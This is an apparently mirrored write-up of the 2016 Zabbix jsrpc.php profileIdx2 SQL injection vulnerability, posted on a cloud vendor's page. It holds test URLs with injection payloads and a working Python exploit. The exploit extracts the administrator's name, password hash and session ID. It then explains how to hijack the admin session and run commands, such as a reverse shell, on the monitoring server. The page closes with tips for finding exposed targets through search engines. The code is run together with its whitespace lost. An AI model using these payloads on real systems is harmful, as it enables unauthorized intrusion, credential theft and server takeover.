zabbix-20160817-high-risk SQL injection Vulnerability

Source: Internet
Author: User
Tags sql injection administrator password

Vulnerability Overview:

Zabbix is an open source enterprise-class performance monitoring solution. Recently, Zabbix's jsrpc profileIdx2 parameter has the Insert method SQL injection vulnerability, the attacker does not need to authorize the login to log on the Zabbix management system, but also can easily obtain the Zabbix server's operating system permission directly through the script and so on function. But there is no need to login to inject here is a premise, that is, Zabbix opened the guest permissions. In Zabbix, the default password for guest is null. Support for this condition is required to allow for no-permission injection.

Degree of impact:

Attack Cost: Low

Hazard Level: High

Whether to login: no

Impact Range:2.2.x, 3.0.0-3.0.3. (Other versions untested)

Vulnerability testing:

Add the following URL after your Zabbix address:

jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pagefile=history.php&profileidx= Web.item.graph&profileidx2=1+or+updatexml (1,MD5 (0x11), 1) +or+1=1)%23&updateprofile=true&period=3600 &stime=20160817050632&resourcetype=17

The output is as follows to indicate that the vulnerability exists:

    

Version: 2.4.6 There are also vulnerabilities

Exploit:

  An attacker could make a further construction statement for the wrong type of SQL injection without acquiring and cracking an encrypted administrator password.

An experienced attacker can construct a SID based on the structure algorithm directly by obtaining the SessionID of the admin, and the replacement cookie is logged directly as an administrator.

  Using code :

/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.getxtamp=1471403798083&mode=2&screenid= &groupid=&hostid=0&pagefile=history.php&profileidx=web.item.graph&profileidx2= (Updatexml ( 0X5E, (MD5 (0x313233)), 0x5e)) &updateprofile=true&screenitemid=&period=3600&stime=20160817050632 &resourcetype=17&itemids%5b23297%5d=23297&action=showlatest&filter=&filter_task=&mark_ Color=1

Get admin cookie and password, can log in Zabbix Monitor system as Administrator, take advantage of admin script function, make Zabbix monitor server execute malicious command (ex: Bounce shell, etc.)

Exploit tool:

#!/usr/bin/env python#-*-CODING:GBK-*-#DATE:2016/8/18ImportUrllib2Importsys, OSImportRedefdeteck_sql (): U'Check if SQL injection is present'Payload="jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2 &screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph& profileidx2=999 ' &updateProfile=true&screenitemid=&period=3600&stime=20160817050632& Resourcetype=17&itemids%5b23297%5d=23297&action=showlatest&filter=&filter_task=&mark_color =1"    Try: Response= Urllib2.urlopen (url + payload, timeout=10). Read ()exceptException, msg:PrintmsgElse: Key_reg= Re.compile (r"Insert\s*into\s*profiles")        ifKey_reg.findall (response):returnTruedefsql_inject (SQL): U'get the content of a specific SQL statement'Payload= URL +"jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2 &screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph& Profileidx2="+urllib2.quote (SQL)+"&updateprofile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17 &itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"    Try: Response= Urllib2.urlopen (Payload, timeout=10). Read ()exceptException, msg:PrintmsgElse: Result_reg= Re.compile (r"duplicate\s*entry\s* ' ~ (. +?) to") Results=Result_reg.findall (response)ifResults:returnResults[0]if __name__=='__main__':    #Os.system ([' Clear ', ' cls '][os.name = = ' nt '])    Print '+'+'-'* 60 +'+'    Print '\ t Python zabbix<3.0.4 SQL injection Exploit'    Print '\t\t time:2016-08-18'    Print '+'+'-'* 60 +'+'    ifLen (SYS.ARGV)! = 2:        Print 'Usage:'+ Os.path.basename (sys.argv[0]) +'Zabbix website Address'        Print 'Example:'+ Os.path.basename (sys.argv[0]) +'http://www.waitalone.cn/'sys.exit () URL= Sys.argv[1]    ifURL[-1]! ='/': URL + ='/'Passwd_sql="(select 1 from (SELECT COUNT (*), concat (SELECT (select Concat (0x7e, select Concat (NAME,0X3A,PASSWD) from Users limit 0,1), 0x7e)) (Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a)"Session_sql="(select 1 from (SELECT COUNT (*), concat (SELECT (select Concat (0x7e, select SessionID from Sessions limit 0,1), 0x7e)) (from Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by x)"    ifdeteck_sql ():PrintU'Zabbix There is a SQL injection vulnerability!\n'        PrintU'Administrator user name password:%s'%Sql_inject (passwd_sql)PrintU'Administrator session_id:%s'%Sql_inject (session_sql)Else:        PrintU'Zabbix There is no SQL injection Vulnerability!\n'

Vulnerability Mining:

Google hacking

Zoom Eye

Search the interface of the monitoring system on the external network

zabbix-20160817-high-risk SQL injection Vulnerability

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.